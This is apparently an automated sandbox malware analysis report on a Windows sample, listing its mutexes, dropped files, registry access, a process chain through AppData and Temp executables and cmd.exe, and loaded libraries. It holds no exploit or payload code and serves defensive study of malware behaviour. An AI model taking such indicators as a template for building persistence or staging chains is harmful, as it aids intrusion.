Windows Analysis Report
TVr2Z822J3.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03

Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe

File created: C:\Users\user~1\AppData\Local\Temp\f4c659c6

Source: TVr2Z822J3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: ActiveISO.exe	String found in binary or memory: :/chookIsoManager/Resources/load.png
Source: ActiveISO.exe	String found in binary or memory: /ADD=
Source: ActiveISO.exe	String found in binary or memory: :/chookIsoManager/Resources/load.png
Source: ActiveISO.exe	String found in binary or memory: /ADD=

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

File read: C:\Users\user\Desktop\TVr2Z822J3.exe

Source: unknown	Process created: C:\Users\user\Desktop\TVr2Z822J3.exe "C:\Users\user\Desktop\TVr2Z822J3.exe"
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Process created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe"
Source: C:\Users\user\ActiveISO.exe	Process created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Process created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe"	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Process created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
